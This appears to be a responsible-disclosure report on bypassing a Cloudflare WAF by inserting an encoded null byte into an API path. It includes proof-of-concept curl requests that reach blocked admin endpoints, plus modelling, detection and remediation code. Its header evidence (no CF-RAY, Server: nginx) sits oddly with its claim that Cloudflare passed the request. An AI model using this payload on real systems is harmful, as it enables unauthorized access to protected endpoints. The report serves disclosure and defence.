WAF Bypass Private Program 2026-01-05

Cloudflare WAF Bypass via Null Byte Injection

Severity: Critical | Status: Resolved

Summary

The Cloudflare WAF in front of the API could be bypassed by injecting a percent-encoded null byte (%00) into the URL path. The edge did not normalize the path the same way the origin did, so requests that the WAF rules should have blocked were passed through to the backend.

Vulnerability Details

The vulnerability stemmed from a parser differential between the WAF and the backend: the two components decoded the same request path differently, so the rule engine evaluated a path that was not the one the application served.

┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attacker   │────▶│ Cloudflare  │────▶│   Backend   │
│             │     │   (C-based) │     │  (Node.js)  │
└─────────────┘     └─────────────┘     └─────────────┘
                           │                    │
                    Sees: "/api"         Sees: "/api/admin"
                    Result: PASS         Result: PROCESS

Technical Explanation

  • WAF parser (C-based): treats the decoded %00 as a string terminator, so the rule engine only evaluates the prefix before it (/api), which matches no admin rule
  • Backend (Node.js): keeps the full string, so after normalization the request is routed as /api/admin and processed normally
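As an added illustration (not code from the original report), the following Node.js script models the two views described above: a C-style consumer that stops reading at the first decoded NUL, and a full-string consumer that keeps everything after it. The WAF rule, the backend behaviour (dropping the NUL so the segments rejoin) and the sample paths are assumptions chosen to match the diagram, not Cloudflare's or the target's actual implementation. hardenedDecision shows the normalize-then-decide approach that removes the differential.

```javascript
'use strict';

// Percent-decode a URL path one byte at a time. Unlike decodeURIComponent this
// never throws and never re-encodes: %00 becomes a literal NUL character, which
// is exactly the byte the two parsers disagree about. Malformed escapes are
// left untouched.
function percentDecode(path) {
  let out = '';
  for (let i = 0; i < path.length; i++) {
    const c = path[i];
    const hex = path.slice(i + 1, i + 3);
    if (c === '%' && /^[0-9a-fA-F]{2}$/.test(hex)) {
      out += String.fromCharCode(parseInt(hex, 16));
      i += 2;
    } else {
      out += c;
    }
  }
  return out;
}

// Model of a C-style consumer: strlen() stops at the first NUL, so the rule
// engine only ever sees the prefix before it. (Assumption, as described in
// the report; not Cloudflare's real code.)
function cStyleView(path) {
  const decoded = percentDecode(path);
  const nul = decoded.indexOf('\0');
  return nul === -1 ? decoded : decoded.slice(0, nul);
}

// Model of the Node.js backend in the report: the whole string is kept and
// the NUL is dropped during normalization, so the segments around it join
// back together. (Assumption; real frameworks differ.)
function backendView(path) {
  return percentDecode(path).replace(/\0/g, '');
}

// Hypothetical WAF rule: deny anything under /api/admin.
function wafRule(seenPath) {
  return seenPath.startsWith('/api/admin') ? 'BLOCK' : 'PASS';
}

// Run one request through both parsers and report whether they diverge.
function parserDifferential(path) {
  const wafSees = cStyleView(path);
  const backendSees = backendView(path);
  return {
    wafSees,
    backendSees,
    wafDecision: wafRule(wafSees),
    differential: wafSees !== backendSees,
  };
}

// The fix: decide on the fully decoded form and refuse any path that decodes
// to a NUL before any rule is evaluated, so both sides see the same thing.
function hardenedDecision(path) {
  const decoded = percentDecode(path);
  if (decoded.includes('\0')) return 'REJECT';
  return wafRule(decoded);
}

// Constructed sample paths, modelled on the PoC in this report.
const samples = ['/api/admin/settings', '/api%00/admin/settings', '/api/public'];
for (const p of samples) {
  console.log(p, parserDifferential(p), 'hardened:', hardenedDecision(p));
}
```

For the bypass path the model reports wafSees "/api" with decision PASS while backendSees "/api/admin/settings", which is the differential in the diagram; hardenedDecision returns REJECT for the same input because it normalizes before matching.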

Proof of Concept

Administrative endpoints that WAF rules normally block with a 403 became reachable once a null byte was inserted into the path:

# Normal request - blocked by WAF
curl -i "https://target.com/api/admin/settings"
# Response: 403 Forbidden (CF-RAY: abc123)

# Bypass request - null byte injection
curl -i "https://target.com/api%00/admin/settings"
# Response: 200 OK (No CF-RAY header - bypassed!)

Detection Method

Header    Normal Request    Bypass Request
------    --------------    --------------
CF-RAY    Present           Missing
Server    cloudflare        nginx
Status    403               200
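The table above is easy to apply by eye to a pair of responses; the following Node.js snippet, added here as an example and not part of the original report, automates it by parsing raw HTTP response heads and classifying who answered from the CF-RAY and Server fingerprints. The two sample responses are constructed for the example (the CF-RAY value is made up), and the 'mixed' class is an addition for responses that carry only one of the two fingerprints and deserve a closer look.

```javascript
'use strict';

// Parse the head of a raw HTTP/1.x response into a status code and a
// lower-cased header map. Duplicate headers are joined with ", ".
function parseResponseHead(raw) {
  const head = raw.split(/\r?\n\r?\n/)[0];
  const lines = head.split(/\r?\n/);
  const statusLine = lines.shift();
  const m = /^HTTP\/\d(?:\.\d)? (\d{3})/.exec(statusLine);
  if (!m) throw new Error('not an HTTP response: ' + statusLine);
  const headers = Object.create(null); // no prototype keys to collide with
  for (const line of lines) {
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
  }
  return { status: Number(m[1]), headers };
}

// Classify who produced the response: 'edge' when both Cloudflare
// fingerprints (CF-RAY and Server: cloudflare) are present, 'origin' when
// neither is, 'mixed' otherwise (e.g. a proxy that rewrites Server).
function classifyResponder({ headers }) {
  const hasRay = 'cf-ray' in headers;
  const cfServer = (headers['server'] || '').toLowerCase() === 'cloudflare';
  if (hasRay && cfServer) return 'edge';
  if (!hasRay && !cfServer) return 'origin';
  return 'mixed';
}

// Compare a baseline (expected-blocked) response with a candidate (bypass
// attempt). True when the baseline was a 403 from the edge and the candidate
// came back from the origin with a non-403 status, which is the signature
// the table above describes.
function looksLikeBypass(baselineRaw, candidateRaw) {
  const base = parseResponseHead(baselineRaw);
  const cand = parseResponseHead(candidateRaw);
  return classifyResponder(base) === 'edge' && base.status === 403 &&
         classifyResponder(cand) === 'origin' && cand.status !== 403;
}

// Constructed sample responses (not captured traffic).
const BLOCKED = [
  'HTTP/1.1 403 Forbidden',
  'Server: cloudflare',
  'CF-RAY: 0000000000000000-XXX',
  'Content-Type: text/html',
  '',
  '<html>blocked</html>',
].join('\r\n');

const BYPASSED = [
  'HTTP/1.1 200 OK',
  'Server: nginx',
  'Content-Type: application/json',
  '',
  '{"settings":{}}',
].join('\r\n');

console.log(classifyResponder(parseResponseHead(BLOCKED)));  // edge
console.log(classifyResponder(parseResponseHead(BYPASSED))); // origin
console.log(looksLikeBypass(BLOCKED, BYPASSED));             // true
```

Feed it the heads of the two curl -i responses from the PoC: the baseline must classify as edge with status 403 before the candidate's origin/200 result is trusted as a bypass signal rather than a misconfigured baseline.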

Impact

Because the rule engine never evaluates the real path, every WAF-based control on that path is defeated:

  • ❌ SQLi/XSS filtering bypassed
  • ❌ Rate limiting bypassed
  • ❌ IP blocking bypassed
  • ❌ Bot protection bypassed

It also exposes the origin server to volumetric DoS traffic that the edge would otherwise have absorbed, since the bypassed requests are served by the origin without edge filtering.

Remediation

# Nginx - block encoded null bytes at the origin.
# $request_uri is the raw request target before any decoding, so an
# encoded %00 is still visible here; ~* makes the match case-insensitive.
if ($request_uri ~* "%00") {
    return 400;
}

// Node.js (Express) middleware - reject any request whose raw URL carries a
// NUL, encoded or literal, before it reaches the router.
const express = require('express');
const app = express();

app.use((req, res, next) => {
  // req.url is the raw request target, so an encoded %00 is still visible here
  if (req.url.includes('%00') || req.url.includes('\x00')) {
    return res.status(400).send('Invalid request');
  }
  next();
});

Responsible Disclosure

This vulnerability was reported responsibly and fixed by the vendor before public disclosure.